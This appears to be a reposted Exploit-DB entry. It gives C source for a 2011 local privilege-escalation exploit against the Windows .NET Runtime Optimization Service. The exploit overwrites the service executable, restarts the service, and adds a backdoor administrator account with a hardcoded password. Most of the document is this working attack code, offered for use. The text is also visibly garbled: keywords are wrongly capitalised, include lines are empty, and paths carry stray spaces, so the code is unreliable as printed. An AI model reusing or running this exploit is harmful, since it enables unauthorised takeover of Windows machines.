. Net Running optimization service development 0day Privilege Upgrade

 
Address: http://www.exploit-db.com/exploits/16940/

/*
# Exploit Title:. NET Runtime Optimization Service Privilege Escalation
# Date: 03-07-2011
# Author: XenoMuta
# Version: v2.0.50727
# Tested on: Windows XP (sp3), 2003 R2, 7
# CVE: n/

__________
|/_ ____/| //___//______
|/_/| _/////__/__'/
//__/////_//////_///_//_//
/_/| _\___/_//_/\____/_//_/\__,_/\__/\__,_/

Xenomuta [at] tuxfamily.org
Xenomuta [at] gmail.com
Http://xenomuta.tuxfamily.org/-Methylxantina 256 mg

This ones a no-brainer, plain simple:

This services EXE file can be overwritten by any non-admin domain user
And local power users (wich are the default permissions set ).
This exploit compiles to a service that uses the original services id.

Tested on Windows 2003, WinXP (sp3) and Win7
(My guess is that it runs on any win box running this service ).

Greetz to fr1t0l4y, L. Garay, siriguillo and the c0ff33 br34k t34m !!

Bless yall!

*/
# Include
# Include

SERVICE_STATUS ServiceStatus;
SERVICE_STATUS_HANDLE hStatus;

# Define PWN_EXE "c: \ WINDOWS \ Microsoft. NET \ Framework \ v2.0.50727 \ mscorsvw.exe"
# Define PWN_SHORT "mscorsvw.exe"
# Define PWN_NAME ". NET Runtime Optimization Service v2.0.50727 _ X86"
# Define PWN_ID "clr_optimization_v2.0.50727_32"

Void ServiceMain (int argc, char ** argv ){
If (InitService ()){
ServiceStatus. dwCurrentState = SERVICE_STOPPED;
ServiceStatus. dwWin32ExitCode =-1;
SetServiceStatus (hStatus, & ServiceStatus );
Return;
}
ServiceStatus. dwCurrentState = SERVICE_RUNNING;
SetServiceStatus (hStatus, & ServiceStatus );
}

Void ControlHandler (DWORD request );
Int InitService ();

Int main (int argc, char ** argv ){
Char acUserName [100];
DWORD nUserName = sizeof (acUserName );
GetUserName (acUserName, & nUserName );

If (strcmp (char *) & acUserName, "SYSTEM ")){
Char * str = (char *) malloc (2048 );
Memset (str, 0, 2048 );
Snprintf (str, 2048, "% s. bak", PWN_EXE );
If (rename (PWN_EXE, str )! = 0 ){
Fprintf (stderr, ":( sorry, cant write to file .");
Exit (1 );
}
CopyFile (argv [0], PWN_EXE ,! 0 );
Snprintf (str, 2048, "net start" % s "2> NUL", PWN_NAME );
Printf (">: D shoshould have created a Username: ServiceHelper Password: ILov3Coff33! ");
System (str );
}

SERVICE_TABLE_ENTRY ServiceTable [2];

ServiceTable [0]. lpServiceName = PWN_ID;
ServiceTable [0]. lpServiceProc = (LPSERVICE_MAIN_FUNCTION) ServiceMain;

ServiceTable [1]. lpServiceName = NULL;
ServiceTable [1]. lpServiceProc = NULL;
StartServiceCtrlDispatcher (ServiceTable );

Return 0;
}

Int InitService (){
System ("cmd/c net user ServiceHelper ILov3Coff33! /Add & net localgroup Administrators ServiceHelper/add ");
}